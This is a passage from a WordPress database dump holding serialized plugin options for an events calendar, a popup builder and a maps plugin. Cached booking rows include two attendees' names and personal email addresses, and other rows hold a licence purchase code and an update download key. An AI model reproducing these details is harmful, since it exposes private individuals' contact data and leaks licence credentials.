Description\";s:17:\"organizer_comment\";s:0:\"\";s:17:\"connection_method\";s:8:\"standard\";s:14:\"payment_method\";s:2:\"cc\";s:9:\"client_id\";s:0:\"\";s:10:\"secret_key\";s:0:\"\";s:15:\"publishable_key\";s:0:\"\";s:3:\"fee\";s:2:\"10\";s:8:\"fee_type\";s:6:\"amount\";s:7:\"fee_per\";s:7:\"booking\";s:16:\"redirection_page\";s:0:\"\";s:5:\"index\";s:1:\"6\";}s:9:\"op_status\";s:1:\"0\";s:18:\"gateways_per_event\";s:1:\"0\";i:8;a:5:{s:6:\"status\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:7:\"comment\";s:25:\"Bank Transfer Description\";s:5:\"index\";s:1:\"8\";s:25:\"disable_auto_confirmation\";s:1:\"0\";}}s:13:\"notifications\";a:12:{s:20:\"booking_notification\";a:4:{s:6:\"status\";s:1:\"1\";s:7:\"subject\";s:0:\"\";s:10:\"recipients\";s:14:\"%%user_email%%\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:7:\"subject\";s:27:\"Please verify your booking.\";s:10:\"recipients\";s:0:\"\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:20:\"booking_confirmation\";a:4:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"Your booking is confirmed.\";s:10:\"recipients\";s:0:\"\";s:7:\"content\";s:243:\"<p>Hi %%name%%,</p>\r\n<p>Your booking is confirmed. You should be available at %%book_date%% in %%event_location_address%%.</p>\r\n<p>You can contact to event organizer by calling %%event_organizer_tel%%.</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:25:\"cancellation_notification\";a:5:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:25:\"Your booking is canceled.\";s:10:\"recipients\";s:0:\"\";s:13:\"send_to_admin\";s:1:\"1\";s:7:\"content\";s:150:\"<p>Hi %%name%%,</p>\r\n<p>For your information, your booking for %%event_title%% at %%book_date%% is canceled.</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:5:{s:6:\"status\";s:1:\"1\";s:7:\"subject\";s:26:\"A new booking is received.\";s:10:\"recipients\";s:0:\"\";s:13:\"send_to_admin\";s:1:\"1\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:9:\"new_event\";a:5:{s:6:\"status\";s:1:\"0\";s:13:\"send_to_admin\";s:1:\"1\";s:7:\"subject\";s:21:\"A new event is added.\";s:10:\"recipients\";s:0:\"\";s:7:\"content\";s:271:\"<p>Hello,</p>\r\n<p>A new event just added. The event title is %%event_title%% and its status is %%event_status%%.<br />\r\nThe new event may need to be published. Please use this link for managing your website events: %%admin_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:21:\"user_event_publishing\";a:4:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:25:\"Your event gets published\";s:10:\"recipients\";s:0:\"\";s:7:\"content\";s:174:\"<p>Hello %%name%%,</p>\r\n<p>Your event gets published. You can check it below:</p>\r\n<p><a href=\\\"%%event_link%%\\\">%%event_title%%</a></p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:13:\"event_soldout\";a:6:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:22:\"Your event is soldout!\";s:10:\"recipients\";s:0:\"\";s:13:\"send_to_admin\";s:1:\"1\";s:17:\"send_to_organizer\";s:1:\"1\";s:7:\"content\";s:143:\"<p>Hi %%name%%,</p>\r\n<p>For your information, your %%event_title%% event at %%book_date%% is soldout.</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:17:\"booking_rejection\";a:7:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"Your booking got rejected!\";s:10:\"recipients\";s:0:\"\";s:13:\"send_to_admin\";s:1:\"1\";s:17:\"send_to_organizer\";s:1:\"1\";s:12:\"send_to_user\";s:1:\"1\";s:7:\"content\";s:150:\"<p>Hi %%name%%,</p>\r\n<p>For your information, your booking for %%event_title%% at %%book_date%% is rejected.</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:16:\"booking_reminder\";a:5:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:10:\"recipients\";s:0:\"\";s:5:\"hours\";s:9:\"24,72,168\";s:7:\"content\";s:0:\"\";}s:14:\"event_finished\";a:5:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:10:\"recipients\";s:0:\"\";s:4:\"hour\";s:1:\"2\";s:7:\"content\";s:0:\"\";}s:16:\"certificate_send\";a:4:{s:6:\"status\";s:1:\"1\";s:7:\"subject\";s:27:\"Event Attendee Certificates\";s:10:\"recipients\";s:0:\"\";s:7:\"content\";s:282:\"Hi %%name%%,\n\n            Congratulations for successfully attending / completing the event %%event_title%%.\n            Click the following link to download or print your PDF certificate.\n            \n            %%certificate_link%%\n\n            Regards,\n            %%blog_name%%\";}}s:12:\"event_fields\";a:3:{i:1;a:3:{s:9:\"mandatory\";s:1:\"0\";s:4:\"type\";s:4:\"text\";s:5:\"label\";s:18:\"Online & In Person\";}s:3:\":i:\";a:6:{s:9:\"mandatory\";s:1:\"0\";s:4:\"type\";s:1:\"p\";s:5:\"label\";s:0:\"\";s:6:\"editor\";s:1:\"0\";s:6:\"ignore\";s:1:\"0\";s:7:\"content\";s:0:\"\";}s:4:\":fi:\";a:1:{s:7:\"options\";a:1:{s:3:\":i:\";a:1:{s:5:\"label\";s:0:\"\";}}}}s:12:\"product_name\";s:0:\"\";s:13:\"purchase_code\";s:32:\"a07a53d4349adc57f0e4334d84144fd2\";s:7:\"styling\";a:13:{s:5:\"color\";s:7:\"#ffa755\";s:9:\"dark_mode\";s:1:\"0\";s:11:\"title_color\";s:0:\"\";s:17:\"title_color_hover\";s:0:\"\";s:13:\"content_color\";s:0:\"\";s:16:\"mec_h_fontfamily\";s:0:\"\";s:16:\"mec_p_fontfamily\";s:0:\"\";s:14:\"disable_gfonts\";s:1:\"0\";s:22:\"container_normal_width\";s:0:\"\";s:21:\"container_large_width\";s:0:\"\";s:9:\"fes_color\";s:0:\"\";s:15:\"notification_bg\";s:0:\"\";s:13:\"mec_colorskin\";s:7:\"#ff5a00\";}s:10:\"reg_fields\";a:4:{i:0;a:3:{s:9:\"mandatory\";s:1:\"1\";s:4:\"type\";s:9:\"mec_email\";s:5:\"label\";s:5:\"Email\";}i:1;a:3:{s:9:\"mandatory\";s:1:\"1\";s:4:\"type\";s:4:\"name\";s:5:\"label\";s:4:\"Name\";}s:3:\":i:\";a:8:{s:9:\"mandatory\";s:1:\"1\";s:4:\"type\";s:1:\"p\";s:5:\"label\";s:15:\"I agree with %s\";s:7:\"mapping\";s:0:\"\";s:6:\"ignore\";s:1:\"0\";s:4:\"page\";s:6:\"126730\";s:6:\"status\";s:7:\"checked\";s:7:\"content\";s:0:\"\";}s:4:\":fi:\";a:1:{s:7:\"options\";a:1:{s:3:\":i:\";a:1:{s:5:\"label\";s:0:\"\";}}}}s:13:\"bfixed_fields\";a:2:{s:3:\":i:\";a:7:{s:9:\"mandatory\";s:1:\"1\";s:4:\"type\";s:1:\"p\";s:5:\"label\";s:15:\"I agree with %s\";s:6:\"ignore\";s:1:\"0\";s:4:\"page\";s:6:\"126730\";s:6:\"status\";s:7:\"checked\";s:7:\"content\";s:0:\"\";}s:4:\":fi:\";a:1:{s:7:\"options\";a:1:{s:3:\":i:\";a:1:{s:5:\"label\";s:0:\"\";}}}}s:8:\"messages\";a:36:{s:19:\"taxonomy_categories\";s:0:\"\";s:17:\"taxonomy_category\";s:0:\"\";s:15:\"taxonomy_labels\";s:0:\"\";s:14:\"taxonomy_label\";s:0:\"\";s:18:\"taxonomy_locations\";s:0:\"\";s:17:\"taxonomy_location\";s:0:\"\";s:19:\"taxonomy_organizers\";s:0:\"\";s:18:\"taxonomy_organizer\";s:0:\"\";s:17:\"taxonomy_speakers\";s:0:\"\";s:16:\"taxonomy_speaker\";s:0:\"\";s:11:\"weekdays_su\";s:0:\"\";s:11:\"weekdays_mo\";s:0:\"\";s:11:\"weekdays_tu\";s:0:\"\";s:11:\"weekdays_we\";s:0:\"\";s:11:\"weekdays_th\";s:0:\"\";s:11:\"weekdays_fr\";s:0:\"\";s:11:\"weekdays_sa\";s:0:\"\";s:20:\"book_success_message\";s:626:\"<div class=\\\"container\\\"> <div class=\\\"row\\\" style=\\\"padding-top: 29px; padding-bottom: 20px;\\\"> <div class=\\\"col-md-12 col-xs-12 col-sm-12\\\"> <p class=\\\"\\\" style=\\\"text-align: center; font-family: Open Sans; font-weight: 400; font-size: 20px;\\\" data-font-family=\\\"Open Sans\\\" data-font-weight=\\\"400\\\" data-font-style=\\\"\\\">Thank you for registering!</p> <p class=\\\"\\\" style=\\\"text-align: center; font-family: Open Sans; font-weight: 400; font-size: 20px;\\\" data-font-family=\\\"Open Sans\\\" data-font-weight=\\\"400\\\" data-font-style=\\\"\\\">Please look for a confirmation email with login information.</p> </div> </div> </div> </div>\";s:28:\"booking_restriction_message1\";s:0:\"\";s:28:\"booking_restriction_message2\";s:0:\"\";s:28:\"booking_restriction_message3\";s:0:\"\";s:14:\"booking_button\";s:0:\"\";s:15:\"register_button\";s:0:\"\";s:11:\"view_detail\";s:0:\"\";s:12:\"event_detail\";s:0:\"\";s:14:\"read_more_link\";s:0:\"\";s:14:\"more_info_link\";s:0:\"\";s:10:\"event_cost\";s:0:\"\";s:4:\"cost\";s:0:\"\";s:6:\"ticket\";s:0:\"\";s:7:\"tickets\";s:0:\"\";s:16:\"other_organizers\";s:0:\"\";s:15:\"other_locations\";s:0:\"\";s:7:\"all_day\";s:0:\"\";s:7:\"booking\";s:0:\"\";s:8:\"bookings\";s:0:\"\";}s:10:\"product_id\";s:3:\"790\";}','yes'),(3961960,'mec_installed','1','yes'),(3961961,'mec_version','7.3.0','yes'),(3961963,'widget_mec_mec_widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(3961964,'widget_mec_single_widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(3961965,'mec_gfont','','yes'),(3961966,'mec_dyncss',':root,::before,::after{--mec-color-skin: #ffa755;--mec-color-skin-rgba-1: rgba(255,167,85,.25);--mec-color-skin-rgba-2: rgba(255,167,85,.5);--mec-color-skin-rgba-3: rgba(255,167,85,.75);--mec-color-skin-rgba-4: rgba(255,167,85,.11);--mec-container-normal-width: 1196px;--mec-container-large-width: 1690px;--mec-fes-main-color: #40d9f1;--mec-fes-main-color-rgba-1: rgba(64, 217, 241, 0.12);--mec-fes-main-color-rgba-2: rgba(64, 217, 241, 0.23);--mec-fes-main-color-rgba-3: rgba(64, 217, 241, 0.03);--mec-fes-main-color-rgba-4: rgba(64, 217, 241, 0.3);--mec-fes-main-color-rgba-5: rgb(64 217 241 / 7%);--mec-fes-main-color-rgba-6: rgba(64, 217, 241, 0.2);--mec-fluent-main-color: #ade7ff;--mec-fluent-main-color-rgba-1: rgba(173, 231, 255, 0.3);--mec-fluent-main-color-rgba-2: rgba(173, 231, 255, 0.8);--mec-fluent-main-color-rgba-3: rgba(173, 231, 255, 0.1);--mec-fluent-main-color-rgba-4: rgba(173, 231, 255, 0.2);--mec-fluent-main-color-rgba-5: rgba(173, 231, 255, 0.7);--mec-fluent-main-color-rgba-6: rgba(173, 231, 255, 0.7);--mec-fluent-bold-color: #00acf8;--mec-fluent-bg-hover-color: #ebf9ff;--mec-fluent-bg-color: #f5f7f8;--mec-fluent-second-bg-color: #d6eef9;}.mec-wrap, .mec-wrap div:not([class^=\"elementor-\"]), .lity-container, .mec-wrap h1, .mec-wrap h2, .mec-wrap h3, .mec-wrap h4, .mec-wrap h5, .mec-wrap h6, .entry-content .mec-wrap h1, .entry-content .mec-wrap h2, .entry-content .mec-wrap h3, .entry-content .mec-wrap h4, .entry-content .mec-wrap h5, .entry-content .mec-wrap h6, .mec-wrap .mec-totalcal-box input[type=\"submit\"], .mec-wrap .mec-totalcal-box .mec-totalcal-view span, .mec-agenda-event-title a, .lity-content .mec-events-meta-group-booking select, .lity-content .mec-book-ticket-variation h5, .lity-content .mec-events-meta-group-booking input[type=\"number\"], .lity-content .mec-events-meta-group-booking input[type=\"text\"], .lity-content .mec-events-meta-group-booking input[type=\"email\"],.mec-organizer-item a, .mec-single-event .mec-events-meta-group-booking ul.mec-book-tickets-container li.mec-book-ticket-container label{ font-family: \"Montserrat\", -apple-system, BlinkMacSystemFont, \"Segoe UI\", Roboto, sans-serif;}.mec-event-content p, .mec-search-bar-result .mec-event-detail{ font-family: Roboto, sans-serif;} .mec-wrap .mec-totalcal-box input, .mec-wrap .mec-totalcal-box select, .mec-checkboxes-search .mec-searchbar-category-wrap, .mec-wrap .mec-totalcal-box .mec-totalcal-view span{ font-family: \"Roboto\", Helvetica, Arial, sans-serif; }.mec-event-grid-modern .event-grid-modern-head .mec-event-day, .mec-event-list-minimal .mec-time-details, .mec-event-list-minimal .mec-event-detail, .mec-event-list-modern .mec-event-detail, .mec-event-grid-minimal .mec-time-details, .mec-event-grid-minimal .mec-event-detail, .mec-event-grid-simple .mec-event-detail, .mec-event-cover-modern .mec-event-place, .mec-event-cover-clean .mec-event-place, .mec-calendar .mec-event-article .mec-localtime-details div, .mec-calendar .mec-event-article .mec-event-detail, .mec-calendar.mec-calendar-daily .mec-calendar-d-top h2, .mec-calendar.mec-calendar-daily .mec-calendar-d-top h3, .mec-toggle-item-col .mec-event-day, .mec-weather-summary-temp{ font-family: \"Roboto\", sans-serif; } .mec-fes-form, .mec-fes-list, .mec-fes-form input, .mec-event-date .mec-tooltip .box, .mec-event-status .mec-tooltip .box, .ui-datepicker.ui-widget, .mec-fes-form button[type=\"submit\"].mec-fes-sub-button, .mec-wrap .mec-timeline-events-container p, .mec-wrap .mec-timeline-events-container h4, .mec-wrap .mec-timeline-events-container div, .mec-wrap .mec-timeline-events-container a, .mec-wrap .mec-timeline-events-container span{ font-family: -apple-system, BlinkMacSystemFont, \"Segoe UI\", Roboto, sans-serif !important; }','yes'),(7437984,'external_updates-mec','O:8:\"stdClass\":5:{s:9:\"lastCheck\";i:1700584703;s:14:\"checkedVersion\";s:5:\"7.3.0\";s:6:\"update\";O:8:\"stdClass\":11:{s:4:\"slug\";s:3:\"mec\";s:7:\"version\";s:5:\"7.3.0\";s:12:\"download_url\";s:84:\"https://api.webnus.site/v3/updates/download.php?key=975014a9480dc57cb3c9d1e8249e45c1\";s:12:\"translations\";a:0:{}s:2:\"id\";i:0;s:8:\"homepage\";s:42:\"https://webnus.net/modern-events-calendar/\";s:6:\"tested\";s:5:\"6.4.1\";s:12:\"requires_php\";s:5:\"5.6.0\";s:14:\"upgrade_notice\";N;s:5:\"icons\";a:2:{s:2:\"1x\";s:90:\"https://api.webnus.site/v3/updates/package-assets/icons/modern-events-calendar-128x128.png\";s:2:\"2x\";s:90:\"https://api.webnus.site/v3/updates/package-assets/icons/modern-events-calendar-256x256.png\";}s:8:\"filename\";s:30:\"modern-events-calendar/mec.php\";}s:11:\"updateClass\";s:23:\"Puc_v4p11_Plugin_Update\";s:15:\"updateBaseClass\";s:13:\"Plugin_Update\";}','no'),(7437998,'HRV31118_cached','a:1:{i:0;a:24:{s:5:\"email\";s:20:\"choll.03@comcast.net\";s:4:\"name\";s:9:\"Christest\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:6:\"row_id\";i:1;s:12:\"attendee_key\";i:0;s:9:\"ticket_id\";s:0:\"\";s:11:\"ticket_name\";s:27:\"ECK Light and Sound Service\";s:12:\"ticket_price\";s:1:\"0\";s:14:\"tickets_amount\";i:0;s:30:\"tickets_amount_with_variations\";i:0;s:46:\"partial_payment_tickets_amount_with_variations\";i:0;s:12:\"ticket_limit\";s:0:\"\";s:17:\"variations_amount\";i:0;s:18:\"variations_details\";a:0:{}s:4:\"date\";s:21:\"1809858600:1809905400\";s:10:\"product_id\";i:0;s:22:\"ticket_timestamp_start\";i:1809858600;s:20:\"ticket_timestamp_end\";i:1809905400;s:22:\"fees_per_ticket_amount\";i:0;s:11:\"fees_amount\";i:0;s:12:\"fees_details\";a:0:{}s:16:\"discounts_amount\";i:0;s:17:\"discounts_details\";a:0:{}}}','no'),(7437999,'MLC23904_cached','a:1:{i:0;a:24:{s:5:\"email\";s:21:\"eileenjoy12@gmail.com\";s:4:\"name\";s:10:\"Eileen Joy\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:6:\"row_id\";i:1;s:12:\"attendee_key\";i:0;s:9:\"ticket_id\";s:0:\"\";s:11:\"ticket_name\";s:27:\"ECK Light and Sound Service\";s:12:\"ticket_price\";s:1:\"0\";s:14:\"tickets_amount\";i:0;s:30:\"tickets_amount_with_variations\";i:0;s:46:\"partial_payment_tickets_amount_with_variations\";i:0;s:12:\"ticket_limit\";s:0:\"\";s:17:\"variations_amount\";i:0;s:18:\"variations_details\";a:0:{}s:4:\"date\";s:21:\"1686479400:1686483000\";s:10:\"product_id\";i:0;s:22:\"ticket_timestamp_start\";i:1686479400;s:20:\"ticket_timestamp_end\";i:1686526200;s:22:\"fees_per_ticket_amount\";i:0;s:11:\"fees_amount\";i:0;s:12:\"fees_details\";a:0:{}s:16:\"discounts_amount\";i:0;s:17:\"discounts_details\";a:0:{}}}','no'),(3961972,'mec_saved_message_2_time','2023-11-17','yes'),(3961973,'mec_custom_msg_2_html','<link rel = \"stylesheet\" type = \"text/css\" href = \"https://webnus.net/modern-events-calendar/addons-api/mec-extra-content/style2.css\" /><div class=\"mec-custom-msg-2-notification-set-box extra\"><div style=\"margin: 0\" class=\"w-row mec-custom-msg-notification-wrap\"><div class=\"w-col-sm-12\"><div class=\"w-clearfix w-box mec-cmsg-2-notification-box-wrap mec-new-addons-wrap\" style=\"margin-top:0;\"><div class=\"w-box-head\">Announcement<span><i class=\"mec-sl-close\"></i></span></div><div class=\"w-box-content\"><div class=\"mec-addons-notification-box-image\" style=\"width: 240px; margin-right: 10px;\"><img src=\"https://webnus.net/modern-events-calendar/addons-api/mec-extra-content/square-integration-addon.svg\" /></div><div class=\"mec-addons-notification-box-content mec-new-addons\" style=\"width: calc(100% - 270px);\"><div class=\"w-box-content\"><div class=\"csm-message-notice\" style=\"text-align: center; background: #BAF0FC57; border-radius: 6px;letter-spacing: 4.4px; color: #00CAE6; text-transform: uppercase; padding: 10px 5px; font-weight: bold; margin-bottom: 40px;\">Square Payment</div><p>As promised, another one of the most-requested addons by you, Square Payment, is released this week. The first six addons are out already. Webex Integration and Social Auto Poster and Elementor FES Builder and Seat and Gutenberg Single Builder and Square Payment are now available on our website for purchase.<br/></p><div style=\"clear:both\"></div><a href=\"https://webnus.net/modern-events-calendar/addons/square-payment/?ref=17\" target=\"_blank\">Read More</a></div></div></div></div></div></div></div>','yes'),(3961974,'mec_custom_msg_2_display','1','yes'),(3961975,'mec_custom_msg_2_display_option','1','yes'),(3961976,'mec_custom_msg_2_close_option','open','yes'),(3961977,'mec_saved_message_time','2023-11-17','yes'),(3961978,'mec_custom_msg_html','<link rel = \"stylesheet\" type = \"text/css\" href = \"https://webnus.net/modern-events-calendar/addons-api/mec-extra-content/style2.css\" /><div class=\"mec-custom-msg-notification-set-box extra\"><div style=\"margin: 0\" class=\"w-row mec-custom-msg-notification-wrap\"><div class=\"w-col-sm-12\"><div class=\"w-clearfix w-box mec-cmsg-notification-box-wrap mec-new-addons-wrap\" style=\"margin-top:0;\"><div class=\"w-box-head\">Announcement<span><i class=\"mec-sl-close\"></i></span></div><div class=\"w-box-content\"><div class=\"mec-addons-notification-box-image\" style=\"width: 240px; margin-right: 10px;\"><img src=\"https://webnus.net/modern-events-calendar/addons-api/mec-extra-content/liquid-view-layouts.svg\" /></div><div class=\"mec-addons-notification-box-content mec-new-addons\" style=\"width: calc(100% - 270px);\"><div class=\"w-box-content\"><div class=\"csm-message-notice\" style=\"text-align: center; background: #BAF0FC57; border-radius: 6px;letter-spacing: 4.4px; color: #00CAE6; text-transform: uppercase; padding: 10px 5px; font-weight: bold; margin-bottom: 40px;\">Liquid View Layouts</div><p>As promised, another one of the most-requested addons by you, Liquid View Layouts, is released this week. The all addons are out already. Webex Integration and Social Auto Poster and Elementor FES Builder and Seat and Gutenberg Single Builder and Square Payment and Liquid View Layouts are now available on our website for purchase.<br/></p><div style=\"clear:both\"></div><a href=\"https://webnus.net/modern-events-calendar/addons/liquid-view-layout/?ref=17\" target=\"_blank\">Read More</a></div></div></div></div></div></div></div>','yes'),(3961979,'mec_custom_msg_display','1','yes'),(3961980,'mec_custom_msg_display_option','1','yes'),(3961981,'mec_custom_msg_close_option','close','yes'),(3964029,'mec_get_webnus_news_time','2023-11-21','yes'),(3964030,'mec_get_webnus_news_html','','yes'),(3997911,'rsssl_secure_cookies_set_dismissed','1','yes'),(4017497,'SGPBUsageDays','0','yes'),(4017498,'SGPBInstallDate','1654012542','yes'),(4017499,'SGPBOpenNextTime','1656604542','yes'),(4017500,'SGPBMaxOpenCount','80','yes'),(4017501,'sgpbPopupBuilderRegisteredPlugins','[]','yes'),(4017502,'SGPB_INACTIVE_EXTENSIONS','inactive','yes'),(4017508,'sgpbModifiedRegisteredPluginsPaths2','1','yes'),(4017518,'sgpb-all-notifications-data','[{\"priority\":1,\"type\":1,\"id\":\"sgpbMainRateUsNotification\",\"message\":\"\\t\\t<style>\\n\\t\\t\\t.sgpb-buttons-wrapper .press{\\n\\t\\t\\t\\tbox-sizing:border-box;\\n\\t\\t\\t\\tcursor:pointer;\\n\\t\\t\\t\\tdisplay:inline-block;\\n\\t\\t\\t\\tfont-size:1em;\\n\\t\\t\\t\\tmargin:0;\\n\\t\\t\\t\\tpadding:0.5em 0.75em;\\n\\t\\t\\t\\ttext-decoration:none;\\n\\t\\t\\t\\ttransition:background 0.15s linear\\n\\t\\t\\t}\\n\\t\\t\\t.sgpb-buttons-wrapper .press-grey {\\n\\t\\t\\t\\tbackground-color:#9E9E9E;\\n\\t\\t\\t\\tborder:2px solid #9E9E9E;\\n\\t\\t\\t\\tcolor: #FFF;\\n\\t\\t\\t}\\n\\t\\t\\t.sgpb-buttons-wrapper .press-lightblue {\\n\\t\\t\\t\\tbackground-color:#03A9F4;\\n\\t\\t\\t\\tborder:2px solid #03A9F4;\\n\\t\\t\\t\\tcolor: #FFF;\\n\\t\\t\\t}\\n\\t\\t\\t.sgpb-buttons-wrapper {\\n\\t\\t\\t\\ttext-align: center;\\n\\t\\t\\t}\\n\\t\\t\\t.sgpb-review-wrapper{\\n\\t\\t\\t\\ttext-align: center;\\n\\t\\t\\t\\tpadding: 20px;\\n\\t\\t\\t}\\n\\t\\t\\t.sgpb-review-wrapper p {\\n\\t\\t\\t\\tcolor: black;\\n\\t\\t\\t}\\n\\t\\t\\t.sgpb-review-h1 {\\n\\t\\t\\t\\tfont-size: 22px;\\n\\t\\t\\t\\tfont-weight: normal;\\n\\t\\t\\t\\tline-height: 1.384;\\n\\t\\t\\t}\\n\\t\\t\\t.sgrb-review-h2{\\n\\t\\t\\t\\tfont-size: 20px;\\n\\t\\t\\t\\tfont-weight: normal;\\n\\t\\t\\t}\\n\\t\\t\\t:root {\\n\\t\\t\\t\\t--main-bg-color: #1ac6ff;\\n\\t\\t\\t}\\n\\t\\t\\t.sgrb-review-strong{\\n\\t\\t\\t\\tcolor: var(--main-bg-color);\\n\\t\\t\\t}\\n\\t\\t\\t.sgrb-review-mt20{\\n\\t\\t\\t\\tmargin-top: 20px\\n\\t\\t\\t}\\n\\t\\t<\\/style>\\n\\t\\t<div class=\\\"sgpb-review-wrapper\\\">\\n\\t\\t\\t<div class=\\\"sgpb-review-description\\\">\\n\\t\\t\\t\\t<h1 class=\\\"sgpb-review-h1\\\"><strong class=\\\"sgrb-review-strong\\\">This is great!<\\/strong> We have noticed that you are using Popup Builder plugin on your site for 325 days, we are thankful for that.<\\/h1>\\t\\t\\t\\t<h2 class=\\\"sgrb-review-h2\\\">This is really great for your website score.<\\/h2>\\n\\t\\t\\t\\t<p class=\\\"sgrb-review-mt20\\\">Have your input in the development of our plugin, and we\\u2019ll provide better conversions for your site!<br \\/> Leave your 5-star positive review and help us go further to the perfection!<\\/p>\\n\\t\\t\\t<\\/div>\\n\\t\\t\\t<div class=\\\"sgpb-buttons-wrapper\\\">\\n\\t\\t\\t\\t<button class=\\\"press press-grey sgpb-button-1 sgpb-close-promo-notification\\\" data-action=\\\"sg-already-did-review\\\">I already did<\\/button>\\n\\t\\t\\t\\t<button class=\\\"press press-lightblue sgpb-button-3 sgpb-close-promo-notification\\\" data-action=\\\"sg-you-worth-it\\\">You worth it!<\\/button>\\n\\t\\t\\t\\t<button class=\\\"press press-grey sgpb-button-2 sgpb-close-promo-notification\\\" data-action=\\\"sg-show-popup-period\\\" data-message-type=\\\"days\\\">Maybe later<\\/button><\\/div>\\n\\t\\t\\t<div>\\u00a0<\\/div>\\n\\t\\t<\\/div>\\n\\t\\t\"},{\"id\":\"sgpbMainSupportBanner\",\"priority\":1,\"type\":1,\"message\":\"<div class=\\\"sgpb-support-notification-wrapper sgpb-wrapper\\\"><h4 class=\\\"sgpb-support-notification-title\\\">Need some help?<\\/h4><h4 class=\\\"sgpb-support-notification-title\\\">Let us know what you think.<\\/h4><a class=\\\"btn btn-info\\\" target=\\\"_blank\\\" href=\\\"https:\\/\\/wordpress.org\\/support\\/plugin\\/popup-builder\\/reviews\\/\\\"><span class=\\\"dashicons sgpb-dashicons-heart sgpb-info-text-white\\\"><\\/span><span class=\\\"sg-info-text\\\">Rate Us<\\/span><\\/a><a class=\\\"btn btn-info\\\" target=\\\"_blank\\\" href=\\\"https:\\/\\/help.popup-builder.com\\\"><span class=\\\"dashicons sgpb-dashicons-megaphone sgpb-info-text-white\\\"><\\/span>Support Portal<\\/a><a class=\\\"btn btn-info\\\" target=\\\"_blank\\\" href=\\\"https:\\/\\/wordpress.org\\/support\\/plugin\\/popup-builder\\\"><span class=\\\"dashicons sgpb-dashicons-admin-plugins sgpb-info-text-white\\\"><\\/span>Support Forum<\\/a><a class=\\\"btn btn-info\\\" target=\\\"_blank\\\" href=\\\"https:\\/\\/popup-builder.com\\/\\\"><span class=\\\"dashicons sgpb-dashicons-editor-help sgpb-info-text-white\\\"><\\/span>LIVE chat<\\/a><a class=\\\"btn btn-info\\\" target=\\\"_blank\\\" href=\\\"mailto:support@popup-builder.com?subject=Hello\\\"><span class=\\\"dashicons sgpb-dashicons-email-alt sgpb-info-text-white\\\"><\\/span>Email<\\/a><\\/div><div class=\\\"sgpb-support-notification-dont-show\\\">Bored of this?<a class=\\\"sgpb-dont-show-again-support-notification\\\" href=\\\"javascript:void(0)\\\"> Press here <\\/a>and we will not show it again!<\\/div>\"}]','yes'),(4017521,'sgpb-unnecessary-scripts-removed-1','1','yes'),(4017799,'SgpbCounter','a:7:{i:264280;i:64;i:264285;i:40;i:264853;i:26;i:264857;i:61;i:264645;i:1;i:265067;i:32;i:265444;i:18;}','yes'),(4018029,'pum_seen_welcome','1','yes'),(4026333,'nf_styler_select_form_id','61','yes'),(4026334,'nf_styler_general_settings','a:1:{s:12:\"reset-styles\";i:-1;}','yes'),(4072955,'sgpb-all-removed-notifications','{\"sgpbMainSupportBanner\":\"sgpbMainSupportBanner\",\"sgpbMainRateUsNotification\":\"sgpbMainRateUsNotification\",\"pb-notif-17-06-2021\":\"pb-notif-17-06-2021\",\"pb-notif-27-11-2021\":\"pb-notif-27-11-2021\",\"pb-halloween2023\":\"pb-halloween2023\"}','yes'),(4111461,'wpgmza_db_version','8.1.11','yes'),(4111462,'wpgmza_global_settings','{\"engine\":\"google-maps\",\"google_maps_api_key\":false,\"default_marker_icon\":\"https:\\/\\/eckankar-colorado.org\\/wp-content\\/plugins\\/wp-google-maps\\/images\\/spotlight-poi2.png\",\"developer_mode\":false,\"user_interface_style\":\"default\",\"wpgmza_gdpr_enabled\":1,\"wpgmza_gdpr_default_notice\":\"<p>\\n\\tI agree for my personal data to be processed by <span name=\\\"wpgmza_gdpr_company_name\\\"><\\/span>, for the purpose(s) of <span name=\\\"wpgmza_gdpr_retention_purpose\\\"><\\/span>.\\n<\\/p>\\n\\n<p>\\t\\n\\tI agree for my personal data, provided via map API calls, to be processed by the API provider, for the purposes of geocoding (converting addresses to coordinates), reverse geocoding and\\tgenerating directions.\\n<\\/p>\\n<p>\\n\\tSome visual components of WP Google Maps use 3rd party libraries which are loaded over the network. At present the libraries are Google Maps, Open Street Map, jQuery DataTables and FontAwesome. When loading resources over a network, the 3rd party server will receive your IP address and User Agent string amongst other details. Please refer to the Privacy Policy of the respective libraries for details on how they use data and the process to exercise your rights under the GDPR regulations.\\n<\\/p>\\n<p>\\n\\tWP Google Maps uses jQuery DataTables to display sortable, searchable tables, such as that seen in the Advanced Marker Listing and on the Map Edit Page. jQuery DataTables in certain circumstances uses a cookie to save and later recall the \\\"state\\\" of a given table - that is, the search term, sort column and order and current page. This data is held in local storage and retained until this is cleared manually. No libraries used by WP Google Maps transmit this information.\\n<\\/p>\\n<p>\\n\\tPlease <a href=\\\"https:\\/\\/developers.google.com\\/maps\\/terms\\\">see here<\\/a> and <a href=\\\"https:\\/\\/maps.google.com\\/help\\/terms_maps.html\\\">here<\\/a> for Google\'s terms. Please also see <a href=\\\"https:\\/\\/policies.google.com\\/privacy?hl=en-GB&amp;gl=uk\\\">Google\'s 